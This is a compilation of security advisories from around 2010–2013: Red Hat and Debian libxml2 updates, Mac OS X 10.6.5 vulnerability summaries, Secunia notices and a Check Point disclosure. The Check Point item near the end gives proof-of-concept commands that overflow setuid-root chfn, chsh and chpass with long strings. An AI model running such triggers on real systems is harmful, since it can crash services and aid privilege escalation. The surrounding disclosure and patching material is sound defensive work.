ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2010-4008.html https://www.redhat.com/security/data/cve/CVE-2010-4494.html https://www.redhat.com/security/data/cve/CVE-2011-0216.html https://www.redhat.com/security/data/cve/CVE-2011-1944.html https://www.redhat.com/security/data/cve/CVE-2011-2821.html https://www.redhat.com/security/data/cve/CVE-2011-2834.html https://www.redhat.com/security/data/cve/CVE-2011-3102.html https://www.redhat.com/security/data/cve/CVE-2011-3905.html https://www.redhat.com/security/data/cve/CVE-2011-3919.html https://www.redhat.com/security/data/cve/CVE-2012-0841.html https://www.redhat.com/security/data/cve/CVE-2012-5134.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRCujqXlSAg2UNWIIRAq0HAJ41YXDqlCpJkg97YuQmaF2MqKDIpACgn5j7 sLTqWGtUMTYIUvLH8YXGFX4= =rOjB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2128-1 security@debian.org http://www.debian.org/security/ Giuseppe Iuculano December 01, 2010 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libxml2 Vulnerability : invalid memory access Problem type : local (remote) Debian-specific: no CVE ID : CVE-2010-4008 Bui Quang Minh discovered that libxml2, a library for parsing and handling XML data files, does not well process a malformed XPATH, causing crash and allowing arbitrary code execution. For the testing (squeeze) and unstable (sid) distribution, this problem has been fixed in version 2.7.8.dfsg-1. We recommend that you upgrade your libxml2 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz Size/MD5 checksum: 3425843 bb11c95674e775b791dab2d15e630fa4 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2.dsc Size/MD5 checksum: 1985 e1a498ed2e38225c5d10aaf834d9e0b9 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2.diff.gz Size/MD5 checksum: 83947 7af1ff46c9cacd57e7f977b295b39084 Architecture independent packages: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5+lenny2_all.deb Size/MD5 checksum: 1307172 ceec72214783bdfc9d7643ea31a61d50 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_alpha.deb Size/MD5 checksum: 920664 429d086d4861511c6d9130bd7a165698 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_alpha.deb Size/MD5 checksum: 856680 fccba5f6884b74e873730e3140e0bad5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_alpha.deb Size/MD5 checksum: 920616 33f850cafef51a45ef04714c9900e737 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_alpha.deb Size/MD5 checksum: 292784 2f2ad873f9f50a0400960264ba823aec http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_alpha.deb Size/MD5 checksum: 38026 e3f0bf3fe0f804bcd39df854e420cee6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_amd64.deb Size/MD5 checksum: 988474 ea406c325fe1d3cf8e80eed39ff61f7e http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_amd64.deb Size/MD5 checksum: 295940 2a1754d35048a827dfeac4ee25f238d5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_amd64.deb Size/MD5 checksum: 37328 0b6af9c052e005c439658215027eeead http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_amd64.deb Size/MD5 checksum: 774114 0c714b77c96e4d840048edbce00d959f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_amd64.deb Size/MD5 checksum: 860726 cf7d9638a12709f527898f9c91ec389d arm architecture (ARM) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_arm.deb Size/MD5 checksum: 246210 484d790396e82318e4eb5e38903497d9 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_arm.deb Size/MD5 checksum: 898986 5cbab6f3b7fa8df4a406d03eaa5762a2 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_arm.deb Size/MD5 checksum: 685530 9b9ea967472806e4f4b0d713d7198706 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_arm.deb Size/MD5 checksum: 782546 1dec5ad219c1f69439936f172323b4d3 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_arm.deb Size/MD5 checksum: 35174 f15d1f05b68e8299b2084315feea6078 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_armel.deb Size/MD5 checksum: 247756 4809a4f17729bfec952e25aeff5f612b http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_armel.deb Size/MD5 checksum: 906754 ee3e37855a6699771d3612180632a1df http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_armel.deb Size/MD5 checksum: 790732 0df793cc442fd5aff099c60852cfd031 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_armel.deb Size/MD5 checksum: 34258 95bb668363b085e6fea0848444ff0a42 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_armel.deb Size/MD5 checksum: 692210 acb1820adf968e8011d16b94cdc6d18c hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_hppa.deb Size/MD5 checksum: 867348 656a379b6cd2f3bc167c4c580f4f9588 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_hppa.deb Size/MD5 checksum: 300124 646af54075ce65b1f318773e55f3b8ae http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_hppa.deb Size/MD5 checksum: 36974 6595d5ef74d9710d4498159da8fe8879 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_hppa.deb Size/MD5 checksum: 931526 94752ea0ec5e56c0ce2bfa6fd8ffc7c2 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_hppa.deb Size/MD5 checksum: 889446 3342e94f7cb0f5c89f4a95969750d6fe i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_i386.deb Size/MD5 checksum: 264698 ce75352a38803aa7d94111c44ccc7a30 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_i386.deb Size/MD5 checksum: 945316 95cf7cbbb06087b7f18c52f897b4ba78 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_i386.deb Size/MD5 checksum: 814750 df1f647ba1306ce5138b50f06089d3db http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_i386.deb Size/MD5 checksum: 698690 4e54bd82a4b679478806da0e14212268 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_i386.deb Size/MD5 checksum: 33754 92c4c50e1a3f6160ab72316d1cf678ba ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_ia64.deb Size/MD5 checksum: 48096 df26f8dc1b4e78de97d22fb6f328844d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_ia64.deb Size/MD5 checksum: 1144394 8a3e9d36f7bcebc74fe83f2f602197c6 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_ia64.deb Size/MD5 checksum: 1150678 6efac0dc67e48b20922bc321ad14b1ed http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_ia64.deb Size/MD5 checksum: 926300 8381127e0f7f55f23a5a798ec6a043b5 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_ia64.deb Size/MD5 checksum: 320066 c18be638d183a965bcff61cbef015b44 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_mipsel.deb Size/MD5 checksum: 975846 27602acbf39c6086b0ccccc2a075888c http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_mipsel.deb Size/MD5 checksum: 809424 62a1a3153b1f2898bd36914b9d953a59 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_mipsel.deb Size/MD5 checksum: 821888 df10f6c3fa7dd05d6aeba73b8a82fe7a http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_mipsel.deb Size/MD5 checksum: 34188 489be157e2061a3e958a1c9693f6fb07 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_mipsel.deb Size/MD5 checksum: 252622 ffe51c47bcaa9883addae4da42850e8a powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_powerpc.deb Size/MD5 checksum: 950566 3ad6dc272c21e8f849fb06cca054dcd6 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_powerpc.deb Size/MD5 checksum: 42054 1b29e288243c30441833b359a36cd09f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_powerpc.deb Size/MD5 checksum: 834730 e79241dec4e3e7328e305a8fb0505d18 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_powerpc.deb Size/MD5 checksum: 285718 df9b1705a6faea8bd1a3f0db9464f4c1 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_powerpc.deb Size/MD5 checksum: 789938 1831f4e506ea36d5d6dbf4af3864835e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_s390.deb Size/MD5 checksum: 38078 b238d71479ae8c7dfdce22b7b96e96f6 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_s390.deb Size/MD5 checksum: 297668 87fc74097472950250bdef49cfc1401d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_s390.deb Size/MD5 checksum: 854128 bba7607e556f4d03578a6fd7b206c542 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_s390.deb Size/MD5 checksum: 762632 aaf2e13c002c2128fd8f06b49e8b0079 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_s390.deb Size/MD5 checksum: 968000 20682a3eddbc11161cabe014eb67cc2f sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5+lenny2_sparc.deb Size/MD5 checksum: 36538 c94d075d63dfa8c35cdca960d12e1ba7 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5+lenny2_sparc.deb Size/MD5 checksum: 845248 9b9da876e13164f4346e7efcf9b94a96 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5+lenny2_sparc.deb Size/MD5 checksum: 279186 1f5a7299a4c7fbf27d73d017909679e9 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5+lenny2_sparc.deb Size/MD5 checksum: 727602 b1b0633a4bdb40f1e0a341a1b86c812c http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.32.dfsg-5+lenny2_sparc.deb Size/MD5 checksum: 803608 8a339109db809222dd0dd9e795062fa2 These files will probably be moved into the stable distribution on its next update

Buffer overflow in AppKit in Apple Mac OS X 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a bidirectional text string with ellipsis truncation. Apple AppKit is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts will cause denial-of-service conditions. This issue affects Apple Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. A stack-based buffer overflow vulnerability exists in AppKit in Apple Mac OS X versions 10.6.x prior to 10.6.5

Apple Type Services (ATS) in Apple Mac OS X 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted embedded font in a document. Successfully exploiting these issues may allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will likely result in a denial-of-service condition. These issues affect the following: Mac OS X v10.5.8 Mac OS X Server v10.5.8 Mac OS X v10.6 Mac OS X v10.6.1 Mac OS X v10.6.2 Mac OS X v10.6.3 Mac OS X v10.6.4 Mac OS X Server v10.6 Mac OS X Server v10.6.1 Mac OS X Server v10.6.2 Mac OS X Server v10.6.3 Mac OS X Server v10.6.4 NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it

Stack-based buffer overflow in Apple Type Services (ATS) in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code via a crafted embedded font in a document. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it

gsb/drivers.php in LANDesk Management Gateway 4.0 through 4.0-1.48 and 4.2 through 4.2-1.8 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the DRIVES parameter, as demonstrated by a cross-site request forgery (CSRF) attack. LANDesk Management Gateway is prone to a remote command-execution vulnerability because the appliance fails to adequately sanitize user-supplied input. Successful exploitation may allow an attacker to execute arbitrary commands and completely compromise the device. LANDesk Management Gateway 4.0-1.48, 4.2-1.8, 4.0-1.61s and 4.2-1.61 versions are affected. Landesk Management Suite is a network management system that controls desktops, servers, and mobile devices, among others. The vulnerability has been confirmed through a cross-site request forgery attack. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: LANDesk Management Gateway Cross-Site Request Forgery Vulnerability SECUNIA ADVISORY ID: SA42188 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42188/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42188 RELEASE DATE: 2010-11-12 DISCUSS ADVISORY: http://secunia.com/advisories/42188/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42188/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42188 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in LANDesk Management Gateway, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. inject and execute arbitrary shell commands if a logged-in administrator visits a specially crafted web site. The vulnerability is reported in versions 4.2 GSBWEB v1.61 and 4.0 GSBWEB v1.61s. SOLUTION: Apply patch GSBWEB_62. PROVIDED AND/OR DISCOVERED BY: Aureliano Calvo, Core Security Technologies ORIGINAL ADVISORY: LANDesk: http://community.landesk.com/support/docs/DOC-21767 Core Security Technologies: http://www.coresecurity.com/content/landesk-os-command-injection-vulnerability OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The kernel in Apple Mac OS X 10.6.x before 10.6.5 does not properly perform memory management associated with terminal devices, which allows local users to cause a denial of service (system crash) via unspecified vectors. Apple Mac OS X is prone to a remote denial-of-service vulnerability. Local attacker can exploit this issue to shutdown the affected computer, denying service to legitimate users. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. This issue affects Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4

Heap-based buffer overflow in Image RAW in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted RAW image. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it

ImageIO in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted PSD image. An attacker could exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. These issues affect Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. NOTE: This was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. ImageIO PSD Memory Corruption - CVE-2010-1845 11/11/2010 Dominic Chell of NGS Secure has discovered a high risk memory corruption vulnerability affecting the ImageIO rendering framework. This issue can be remotely (client-side) exploited through any application using the framework including Mail, Safari and QuickLook. The announcement of this patch can be found here: http://support.apple.com/kb/HT1222 Patches can be downloaded from the following links. Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338 Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/ NGS Secure are going to withhold details about these flaws for three months. Full details will be published on 11/02/2011. This three month window will allow Apple customers the time needed to test and apply the patch set before the details are released to the general public. This reflects NGS Secure's approach to responsible disclosure. NGS Secure Research http://www.ngssecure.com/ ________________________________ Dominic Chell Senior Security Consultant NGS Secure 52 Throwley Way Sutton, SM1 4BF Telephone: +44 (0)208 401 0070 Mobile: +44 (0)7545502538 Fax: Website: www.ngssecure.com Email: Dominic.Chell@ngssecure.com<mailto:Dominic.Chell@ngssecure.com> [http://www.nccgroup.com/_client/images/global/NGS%20Secure.jpg] <http://www.ngssecure.com/> ________________________________ This email is sent for and on behalf of NGS Secure Limited (Registered in England CRN: 04474600). The ultimate holding company is NCC Group plc (Registered in England CRN: 4627044). Registered Office: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF Confidentiality: This e-mail contains proprietary information, some or all of which may be confidential and/or legally privileged. It is for the intended recipient only. If an addressing or transmission error has misdirected this e-mail, please notify the author by replying to this e-mail and then delete the original. If you are not the intended recipient you may not use, disclose, distribute, copy, print or rely on any information contained in this e-mail. You must not inform any other person other than NCC Group or the sender of its existence. For more information about NGS Secure please visit www.ngssecure.com<http://www.ngssecure.com> P Before you print think about the ENVIRONMENT

Unspecified vulnerability in Image Capture in Apple Mac OS X 10.6.x before 10.6.5 allows remote attackers to cause a denial of service (memory consumption and system crash) via a crafted image. Successful exploits will allow attackers to execute arbitrary code or crash the affected application. This issue affects Apple Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it

Networking in Apple Mac OS X 10.6.2 through 10.6.4 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted PIM packet. No authentication or user interaction is required in order to exploit this vulnerability.The specific flaw exists within OSX's IPv6 stack. A NULL pointer dereference vulnerability was discovered in the xnu kernel implementation when a specially formatted packet is sent to it. Exploiting this vulnerability will result in a remote denial of service against the target os. Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. This issue affects Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4. The update addresses new vulnerabilities that affect: AFP Server, AppKit, ATS, CFNetwork, CoreGraphics, Apple Type Service, CoreGraphics, CoreText, Directory Service, Image Capture, ImageIO, Image RAW, Networking, Kernel, OpenSSL, Password Server, Printing, QuickLook, QuickTime, Safari RSS, Time Machine, and xar. This BID is being retired. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Apple iOS Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42314 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42314/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42314 RELEASE DATE: 2010-11-24 DISCUSS ADVISORY: http://secunia.com/advisories/42314/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42314/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42314 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Apple iOS, which can be exploited by malicious people to conduct cross-site scripting and spoofing attacks, disclose sensitive information, bypass certain security restrictions, or to compromise a user's system. For more information: SA40257 SA41328 SA42151 SA42312 SOLUTION: Upgrade to iOS 4.2 (downloadable and installable via iTunes). ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4456 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Disk Images in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted UDIF image. Apple Mac OS X is prone to a remote memory corruption vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts will cause denial-of-service conditions. This issue affects Apple Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4 and Mac OS X 10.5.8 and Mac OS X Server 10.5.8. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it

Stack-based buffer overflow in the password-validation functionality in Directory Services in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. Local attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4, and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Apple Directory Services Memory Corruption CVE-2010-1840 INTRODUCTION chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default. This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh CVSS Scoring System The CVSS score is: 3.3 Base Score: 4.2 Temporal Score: 3.3 We used the following values to calculate the scores: Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C Temporal score is: E:POC/RL:OF/RC:C TRIGGERING THE PROBLEM /usr/bin/chfn -u `perl -e 'print "A" x 3000'` /usr/bin/chsh -u `perl -e 'print "A" x 3000'` /usr/bin/chpass -u `perl -e 'print "A" x 3000'` DETAILS Disassembly: 0x92237215 